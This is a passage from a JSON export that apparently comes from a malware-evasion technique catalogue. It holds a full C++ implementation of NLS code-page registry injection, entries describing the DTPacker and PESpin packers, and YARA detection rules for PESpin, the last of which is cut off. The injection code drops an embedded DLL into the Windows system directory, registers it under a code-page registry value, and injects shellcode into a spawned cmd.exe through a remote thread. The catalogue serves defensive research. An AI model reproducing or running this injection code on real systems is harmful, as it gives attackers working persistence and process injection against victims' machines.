                    "plain_code": "/* NLSRegistryCodeInjection.cpp */\r\n\r\n#include \"payload.hpp\"\r\n#include \"headers.hpp\"\r\n\r\n//Pending: Make initializer_list cleaner\r\nuint32_t main(void)\r\n{\r\n    std::initializer_list<std::wstring> list = { L\"SYSTEM\\\\ControlSet001\\\\Control\\\\Nls\\\\CodePage\", L\"Payload.dll\" , L\"\"};\r\n    auto regObj = std::make_unique<RegistryManipulation>(list);\r\n    if (OpenKeyForNlsModification(regObj.get()))\r\n    {\r\n#ifdef DEBUG\r\n        std::printf(\"Key has been modified, now preparing for injection\\n\");\r\n#endif \r\n        std::printf(\"Payload executed sucessfully :)\\n\");\r\n        system(\"pause\");\r\n    }\r\n\r\n    return EXIT_SUCCESS;\r\n}\r\n//###########################################################\r\n/* payload.cpp */\r\n\r\n#include \"headers.hpp\"\r\n#include \"payload.hpp\"\r\n#include \"strsafe.h\"\r\n#include \"payload.hpp\"\r\n#include \"resource1.h\"\r\n#define MAX_SIZE_DATA 260\r\n\r\n//IMPLEMENTED IT two different functions for convertion. \r\nUINT StringToIntDecimal(PWCHAR str) noexcept\r\n{\r\n\tuint32_t num = _wtoi(str);\r\n\treturn num;\r\n}\r\nUINT StringToInt(PWCHAR str) noexcept {\r\n\r\n\twchar_t chrSubkey, chr, * j;\r\n\tUINT i;\r\n\tj = str;\r\n\tchrSubkey = *str;\r\n\tfor (i = 0; *j; chrSubkey = *j)\r\n\t{\r\n\t\t++j;\r\n\t\tif ((chrSubkey - 0x41) > 5u)\r\n\t\t{\r\n\t\t\tif ((chrSubkey - 0x30) > 9u)\r\n\t\t\t{\r\n\t\t\t\tif ((chrSubkey - 0x61) > 5u)\r\n\t\t\t\t\treturn i;\r\n\t\t\t\tchr = chrSubkey - 87;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tchr = chrSubkey - 0x30;\r\n\t\t\t}\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tchr = chrSubkey - 55;\r\n\t\t}\r\n\t\ti = chr + 16 * i;\r\n\t}\r\n\treturn i;\r\n}\r\nBOOLEAN CompareLastElementString(PWCHAR str1, PWCHAR str2, BOOLEAN CaseInsensitive)\r\n{\r\n\tbool bResult = false;\r\n\t//Has to find .dll somewhere, in the substring, otherwise doesnt exist.\r\n\twchar_t* dll = wcsstr(str1, str2);\r\n\tif (dll != nullptr) {\r\n\t\tbResult = true;\r\n\t}\r\n\treturn bResult;\r\n}\r\nbool FindCodePageWithPayload(PRegistryKey regObject, UINT dwValuesCount, UINT dwMaxLenValues){\r\n\tDWORD dwCountName = 0, typeData, ValueDataSize = 0;\r\n\t//uint32_t CodePageInt;\r\n\tWCHAR CodePageID[MAX_PATH], ValueData[MAX_SIZE_DATA];\r\n\tbool bResult = false;\r\n\r\n\tfor (UINT i = 0; i < dwValuesCount; i++) {\r\n\t\tdwCountName = 260;  \r\n\t\tValueDataSize = 260;\r\n\t\tLSTATUS status = RegEnumValueW(regObject->hSubkeyNls, i, CodePageID, &dwCountName, nullptr, &typeData, (BYTE*)&ValueData,\r\n\t\t\t&ValueDataSize);\r\n\t\tif (status != ERROR_SUCCESS && GetLastError() != ERROR_ALREADY_EXISTS)\r\n\t\t{\r\n\t\t\tstd::wprintf(L\"Could not query Code Page ID %s, Last error: [%x]\\n\", CodePageID, GetLastError());\r\n\t\t\tcontinue;\r\n\t\t}\r\n#ifdef _DEBUG\r\n\t\tstd::wprintf(L\"Iterating: %d - %s = %s\\n\", i, CodePageID, ValueData);\r\n#endif \r\n\t\tif (typeData == REG_SZ && regObject->compareStringEqual(Index::DLL_NAME, ValueData)){\r\n#ifdef _DEBUG\r\n\t\t\tstd::wprintf(L\"Payload value has been found!: %d - %s = %s\\n\", i, CodePageID, ValueData);\r\n#endif\r\n\t\t\tuint32_t strHex = std::stoull(CodePageID, nullptr, 10);\r\n\t\t\tuint32_t strDecimal = std::stoull(CodePageID, nullptr, 16);\r\n\t\t\tregObject->setCodePageID(strHex, CodePageIDIndex::CodePageInt);\r\n\t\t\tregObject->setCodePageID(strDecimal, CodePageIDIndex::CodePageHex);\r\n\t\t\tstd::wprintf(L\"Values: CodepageHex = %d, CodePageInt = 0x%x\\n\", strDecimal, strHex);\r\n\t\t\tbResult = true;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\treturn bResult;\r\n}\r\n\r\nbool IterateCodePageAndExtractProperId(PRegistryKey regObject) {\r\n\tDWORD dwMaxLenValues, dwCountName = 0, dwValuesCount, typeData, ValueDataSize = 0;\r\n\tuint32_t CodePageInt = NULL, posCount = NULL;\r\n\tbool correctRet = false;\r\n\tLSTATUS status;\r\n\tWCHAR CodePageID[MAX_PATH], ValueData[MAX_SIZE_DATA];\r\n\r\n\t//Queries information for the NLS subkey, mostly related to the values, which is the part that interests us the most.\r\n\tif (::RegQueryInfoKeyW(regObject->hSubkeyNls, nullptr, nullptr, nullptr,\r\n\t\tnullptr, nullptr, nullptr, &dwValuesCount, &dwMaxLenValues, nullptr, nullptr, nullptr))\r\n\t{\r\n\t\tstd::cerr << \"Could not query information for the key, last error is: \" << GetLastError() << \"\\n\";\r\n\t\treturn correctRet;\r\n\t}\r\n\t//Only one failing, lets fix it.\r\n\tif (FindCodePageWithPayload(regObject, dwValuesCount, dwMaxLenValues)){\r\n\t\tcorrectRet = true;\r\n\t\treturn correctRet;\r\n\t}\r\n\t//Find one with .dll, then from there increase one until it works out.\r\n\tfor (UINT i = 0; i < dwValuesCount; i++) {\r\n\t\tdwCountName = 260;\r\n\t\tValueDataSize = 260;\r\n\t\tstatus = RegEnumValueW(regObject->hSubkeyNls, i, CodePageID, &dwCountName, nullptr, &typeData, (BYTE*)&ValueData,\r\n\t\t\t&ValueDataSize);\r\n\t\tif ((status != EXIT_SUCCESS) && (GetLastError() != ERROR_ALREADY_EXISTS))\r\n\t\t{\r\n\t\t\tstd::wprintf(L\"Could not query Code Page ID %s, Last error: [%x]\\n\", CodePageID, status);\r\n\t\t\tcontinue;\r\n\t\t}\r\n#ifdef _DEBUG\r\n\t\tstd::wprintf(L\"Querying value i: %d, %s = %s\\n\", i, CodePageID, ValueData);\r\n#endif\r\n\t\tif (typeData == REG_SZ && CompareLastElementString(ValueData, const_cast<wchar_t*>(L\".dll\"), FALSE))\r\n\t\t{\r\n#ifdef _DEBUG\r\n\t\t\tstd::wprintf(L\"Value with dll found in i = %d, %s = %s\\n\", i, CodePageID, ValueData);\r\n\t\t\t//Convert from str to hex\r\n\t\t\tCodePageInt = StringToInt(CodePageID);\r\n\t\t\tstd::wprintf(L\"Code page as int is: %x\\n\", CodePageInt);\r\n#endif // _DEBUG\r\n\t\t\tCodePageInt = StringToInt(CodePageID);\r\n\t\t\tposCount = i;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif (CodePageInt == NULL) {\r\n\t\tstd::printf(\"Could not find apropiate dll extension inside one of the subvalues\\n\");\r\n\t\treturn correctRet;\r\n\t}\r\n\t//FIX THIS CODE, WHEN PRINTING THERE IS SOMETHING THAT GOES WRONG.\r\n\tCodePageInt += 1;\r\n\tfor (UINT i = 0; i < dwValuesCount - posCount; i++) {\r\n\t\t//2.Then we proceed to check if the code page ID value exists, if it doesnt, we create it and set the data.\r\n\t\tif (SUCCEEDED(StringCchPrintfW(ValueData, MAX_SIZE_DATA, L\"%04x\", CodePageInt)))\r\n\t\t{\r\n\t\t\tstd::printf(\"Trying to create in CodePage ID %x\\n\", CodePageInt);\r\n\t\t}\r\n\t\tstatus = RegQueryValueEx(regObject->hSubkeyNls, ValueData, NULL, NULL, NULL, NULL);\r\n\t\tif (status != ERROR_SUCCESS && status == ERROR_FILE_NOT_FOUND)\r\n\t\t{\r\n\t\t\tif (!RegSetValueExW(regObject->hSubkeyNls, ValueData, NULL, REG_SZ, (BYTE*)regObject->getStringBuffer(Index::DLL_NAME),\r\n\t\t\t\tregObject->getStringSize(Index::DLL_NAME)))\r\n\t\t\t{\r\n\t\t\t\t//std::wprintf(L\"The string value of the data is: %s\\n\", ValueData);\r\n\t\t\t\tuint32_t CodePageDecimal = StringToIntDecimal(ValueData);\r\n\t\t\t\tstd::printf(\"Sucessfully created dll payload in CodePage ID %x\\n\", CodePageInt);\r\n\t\t\t\tregObject->setCodePageID(CodePageInt, CodePageIDIndex::CodePageHex);\r\n\t\t\t\tregObject->setCodePageID(CodePageDecimal, CodePageIDIndex::CodePageInt);\r\n\t\t\t\tstd::wprintf(L\"Values: CodepageHex = %d, CodePageInt = 0x%x\\n\", CodePageInt, CodePageDecimal);\r\n\t\t\t\tcorrectRet = true;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\tCodePageInt += 1;\r\n\t}\r\n\treturn correctRet;\r\n}\r\n\r\nbool CreateProcessToInject(LPPROCESS_INFORMATION procInfo) {\r\n\tSTARTUPINFOW infoProc;\r\n\t//PROCESS_INFORMATION processInfo;\r\n\tZeroMemory(&infoProc, sizeof(infoProc));\r\n\tinfoProc.cb = sizeof(infoProc);\r\n\tZeroMemory(procInfo, sizeof(procInfo));\r\n\twchar_t path[MAX_PATH];\r\n\tGetSystemDirectoryW(path, MAX_PATH);\r\n\twcscat_s(path, MAX_PATH, L\"\\\\cmd.exe\");\r\n\treturn CreateProcessW(NULL, path, NULL, NULL, false, CREATE_NEW_CONSOLE, NULL, NULL, &infoProc, procInfo) != NULL;\r\n}\r\n\r\nbool DropSystemDllPayload(PRegistryKey regObject) {\r\n\tHMODULE hMod = GetModuleHandleA(NULL);\r\n\tHRSRC hResource = FindResource(hMod, MAKEINTRESOURCE(IDR_RT_RCDATA1), L\"RT_RCDATA\");\r\n\tif (hResource == NULL)\r\n\t{\r\n\t\tprintf(\"Could not find the payload dll resource, exiting...\\n\");\r\n\t\treturn false;\r\n\t}\r\n\tDWORD dwSizeResource = SizeofResource(hMod, hResource);\r\n\tHGLOBAL hResLoaded = LoadResource(hMod, hResource);\r\n\tif (hResLoaded == NULL)\r\n\t{\r\n\t\tprintf(\"Could not find the dll, exiting...\\n\");\r\n\t\treturn false;\r\n\t}\r\n\tauto pBuffer = static_cast<BYTE*> (LockResource(hResLoaded));\r\n\tLPWSTR pathPayload = new wchar_t[MAX_PATH];\r\n\tGetSystemDirectoryW(pathPayload, MAX_PATH);\r\n\twcscat_s(pathPayload, MAX_PATH, L\"\\\\\");\r\n\twcscat_s(pathPayload, MAX_PATH, regObject->getStringBuffer(Index::DLL_NAME));\r\n\tregObject->setStringBuffer(pathPayload, Index::FULL_PAYLOAD_DLL_PATH);\r\n\tHANDLE hFile = CreateFileW(pathPayload, GENERIC_ALL, FILE_SHARE_DELETE,\r\n\t\tNULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, nullptr);\r\n\tdelete[] pathPayload;\r\n\tif (hFile == INVALID_HANDLE_VALUE)\r\n\t{\r\n\t\tif (GetLastError() == ERROR_FILE_EXISTS){\r\n\t\t\tstd::printf(\"File already exists, trying to set up registry.\\n\");\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\tstd::printf(\"Could not obtain HANDLE to the newly created FILE, last error is %d\\n\", GetLastError());\r\n\t\treturn false;\r\n\t}\r\n\tDWORD dwNumberBytesWritten;\r\n\tif (!WriteFile(hFile, pBuffer, dwSizeResource, &dwNumberBytesWritten, nullptr))\r\n\t{\r\n\t\tstd::printf(\"Could not write to file, last error is %d\\n\", GetLastError());\r\n\t\tCloseHandle(hFile);\r\n\t\treturn false;\r\n\t}\r\n\tCloseHandle(hFile);\r\n\treturn true;\r\n}\r\n\r\nvoid SelfSpawnPayload(DWORD dwCodePageId)\r\n{\r\n\tif (!GetConsoleWindow())\r\n\t{\r\n\t\tif (!AllocConsole()) {\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\tif (!SetConsoleOutputCP(dwCodePageId)) {\r\n\t\tstd::printf(\"Could not self test injection in SetConsoleOutputCP, last error is: 0x%x\\n\", GetLastError());\r\n\t\treturn;\r\n\t}\r\n\tif (!SetConsoleCP(dwCodePageId)) {\r\n\t\tstd::printf(\"Could not self test for SetConsoleCp: Last error is 0x%x\\n\", GetLastError());\r\n\t\treturn;\r\n\t}\r\n\tSetThreadUILanguage(0);\r\n}\r\n\r\nvoid InjectStagerToPayload(PRegistryKey regObject) {\r\n\tLPVOID lpCodePageID = (LPVOID)VirtualAllocEx(regObject->m_procInfo.hProcess, NULL, sizeof(DWORD), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\r\n\tif (lpCodePageID == nullptr) {\r\n\t\tstd::printf(\"Could not allocate buffer in remote process\\n\");\r\n\t\treturn;\r\n\t}\r\n\tDWORD codePageID = regObject->getCodePageID(CodePageIDIndex::CodePageInt);\r\n\tif (!WriteProcessMemory(regObject->m_procInfo.hProcess, lpCodePageID, &codePageID, sizeof(DWORD), NULL)) {\r\n\t\tstd::printf(\"Could not create write memory with codePageID to inject\\n\");\r\n\t\treturn;\r\n\t}\r\n\t//Alloc and write shellcode, easiest way is VirtualAllocEx + WPM, but we have to pass arg, so I am not so sure how I am going to do that...\r\n\tLPVOID ShellcodeMemory = (LPVOID)VirtualAllocEx(regObject->m_procInfo.hProcess, NULL, lengthInject, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\r\n\tif (ShellcodeMemory == nullptr) {\r\n\t\tstd::printf(\"Could not allocate buffer in remote process\\n\");\r\n\t\treturn;\r\n\t}\r\n\t//This will write the payload in the remote process.\r\n\tif (!WriteProcessMemory(regObject->m_procInfo.hProcess, ShellcodeMemory, &StubInject, lengthInject, NULL)) {\r\n\t\tstd::printf(\"Could not create write memory with codePageID to inject\\n\");\r\n\t\treturn;\r\n\t}\r\n\t//Need to change protection to EXECUTE_READ.\r\n\tDWORD dwProtection;\r\n\tif (!VirtualProtectEx(regObject->m_procInfo.hProcess, ShellcodeMemory, lengthInject, PAGE_EXECUTE_READ, &dwProtection)) {\r\n\t\tstd::printf(\"Could not change protection of memory for shellcode injection. Last error is 0x%x\\n\", GetLastError());\r\n\t\treturn;\r\n\t}\r\n\tHANDLE hThread = CreateRemoteThread(regObject->m_procInfo.hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)ShellcodeMemory, lpCodePageID, 0, nullptr);\r\n\tif (hThread == INVALID_HANDLE_VALUE) {\r\n\t\tstd::printf(\"Could not open a handle to the payload .exe\\n\");\r\n\t\treturn;\r\n\t}\r\n\tstd::printf(\"Sucessfully injected to remote process, where shellcodeMemory is %p, and the codePageID is %d\\n\", ShellcodeMemory, codePageID);\r\n}\r\n\r\n//Error of payload is at writing the payload.dll!\r\nbool OpenKeyForNlsModification(PRegistryKey regObject) noexcept\r\n{\r\n\tbool bResult = false; \r\n\tif (RegOpenKeyExW(HKEY_LOCAL_MACHINE, regObject->getStringBuffer(Index::SUBKEY_KEY_VALUE),\r\n\t\t0, KEY_ALL_ACCESS, &regObject->hSubkeyNls) != EXIT_SUCCESS)\r\n\t{\r\n\t\tstd::printf(\"Could not open handle to subkey of codePage!, LastError [0x%x]\\n\", GetLastError());\r\n\t\treturn bResult;\r\n\t}\r\n\tif (!DropSystemDllPayload(regObject)) {\r\n\t\tstd::printf(\"Payload dll has been failed to drop main payload \\n\");\r\n\t\treturn bResult;\r\n\t}\r\n\tif (!IterateCodePageAndExtractProperId(regObject)){\r\n\t\tstd::printf(\"Could not iterate key for proper modification. Last error: [0x%x]\\n\", GetLastError());\r\n\t\treturn bResult;\r\n\t}\r\n\t//DWORD dwCodePageID = regObject->getCodePageID(CodePageIDIndex::CodePageInt);\r\n\t//std::printf(\"The code page ID is %d\\n\", dwCodePageID);\r\n\t//SelfSpawnPayload(dwCodePageID);\r\n\tif (CreateProcessToInject(&regObject->m_procInfo))\r\n\t{\r\n\t\tInjectStagerToPayload(regObject);\r\n\t}\r\n\r\n\treturn bResult;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 207,
            "unprotect_id": "U1416",
            "name": "DTPacker",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "DTPacker is a .NET packer or downloader which although seeing considerable variety in the first stage, uses a second stage with a fixed password as part of the decoding. \r\n\r\nThe main difference between a packer and a downloader is the location of the payload data which is embedded in the former and downloaded in the latter. DTPacker uses both forms. It is unusual for a piece of malware to be both a packer and downloader.  \r\n\r\nThis packer uses multiple obfuscation techniques to evade antivirus, sandboxing, and analysis. It is likely distributed on underground forums",
            "resources": "https://www.proofpoint.com/au/blog/threat-insight/dtpacker-net-packer-curious-password-1",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 206,
            "unprotect_id": "U1425",
            "name": "PESpin",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "PESpin is a Windows executable files protector, compressor coded in Win32ASM using MASM. Overall, this application will enable the compression of the entire executable - code, data, and resources, thus leaving the file protected against patching or disassembling.",
            "resources": "http://downloads.fyxm.net/PESpin-95477.html",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 116,
                    "key": "yara_detect_pespin",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_detect_Pespin",
                    "rule": "rule PESpin_V07_cyberbobnbsp_nbsp_SignByfly_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 00 EB FB FF 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? EB 01 ?? 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 ?? EB FB ?? 83 04 24 0C C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V13betaX_cyberbobnbsp_nbsp_SignByfly_20080311: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 ?? EB FB ?? ?? ?? ?? ?? ?? ?? 8B 42 3C 03 C2 ?? ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V1304_cyberbobnbsp_nbsp_SignByfly_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 ?? EB 01 ?? EB 0D ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 ?? EB FB ?? ?? ?? ?? ?? ?? ?? 8B 42 3C 03 C2 ?? ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 ?? ?? ?? ?? EB 06 ?? ?? ?? ?? ?? ?? F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V041_cyberbob_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 02 D2 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 ?? ?? ?? ?? ?? 53 8F ?? ?? ?? ?? ?? BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 ?? 68 3C 01 00 00 59 8D ?? ?? ?? ?? ?? C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 ?? ?? ?? ?? 59 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 ?? E8 1A 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v1304_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 CD 4E 40 00 8B 42 3C 03 C2 89 85 D7 4E 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D EB 4E 40 00 53 8F 85 E1 4C 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD 90 4F 40 00 8D 5B 04 8B 1B 89 9D 95 4F 40 00 E8 00 00 00 00 58 01 68 05 68 D3 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC FF 25 10 BB ?? 00 00 00 B9 84 12 00 00 8D BD C6 4F 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C EB 04 01 EB 0? }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_v01_Cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 B3 28 40 00 8B 42 3C 03 C2 89 85 BD 28 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D D1 28 40 00 53 8F 85 C4 27 40 00 BB ?? 00 00 00 B9 A5 08 00 00 8D BD 75 29 40 00 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D BD AA 30 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 07 4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D C4 28 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 59 81 C1 1D 00 00 00 52 51 C1 E9 05 23 D1 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_03_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v1304_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v13beta_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V10_cyberbob_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 ?? ?? ?? ?? ?? ?? ?? C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 ?? EB FB FF 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 ?? ?? ?? ?? 83 04 24 0C C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V01_cyberbob_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 ?? ?? ?? ?? ?? 53 8F 85 ?? ?? ?? ?? BB ?? ?? ?? ?? B9 A5 08 00 00 8D ?? ?? ?? ?? ?? 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D ?? ?? ?? ?? ?? C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 ?? ?? ?? ?? 4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_13x_Cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 